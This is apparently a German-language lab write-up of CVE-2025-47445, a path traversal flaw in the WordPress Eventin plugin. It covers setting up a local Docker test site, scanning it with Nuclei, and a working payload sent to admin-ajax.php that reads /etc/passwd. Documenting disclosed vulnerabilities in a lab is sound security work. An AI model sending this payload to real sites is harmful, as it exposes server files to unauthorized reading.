
Proof-of-Concept-Exploit für CVE-2025-47445, eine Pfad traversal-Schwachstelle im WordPress Eventin-Plugin. Enthält Setup-Anweisungen für eine lokale Docker-Umgebung und manuelle Exploit-Schritte.
| Info |
|---|
| Wordpress plugin: | Wordpress Eventin |
| Plugin version: | 4.0.26 (or older) |
| CVE information: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| Tools of interest: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Das Worfence Docker WordPress Research Lab wird mit zwei verschiedenen Umgebungen geliefert, eine mit einer älteren PHP-Version, wir wählen die neuere.
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
Danach habe ich die Wordpress-Seite über localhost:1337 eingerichtet. Ich lade das Eventin-Plugin, speziell Version 4.0.26, aus dem Plugin-Store herunter und installiere und aktiviere es über die Wordpress-Oberfläche.
Jetzt sollte alles bereit sein.
Ich möchte sehen, ob Nuclei die gesuchte CVE finden kann, also starte ich eine Instanz in einem temporären Docker-Container.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Ich habe Nuclei mehrmals ausgeführt und verschiedene Ergebnisse erhalten, ich bin nicht sicher warum. Aber schließlich findet es die CVE und ein paar andere Dinge, nach denen ich nicht spezifisch gesucht habe.

Um zu sehen, ob ich auf die /etc/passwd-Datei zugreifen kann, füge ich einfach den folgenden Payload in meine GET-Anfrage ein.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
Und es war ein Erfolg.

Dies wurde zu Bildungszwecken durchgeführt.
Stellen Sie sicher, dass Sie Ihre gesamte Software aktualisieren. Täglich werden neue CVEs gefunden.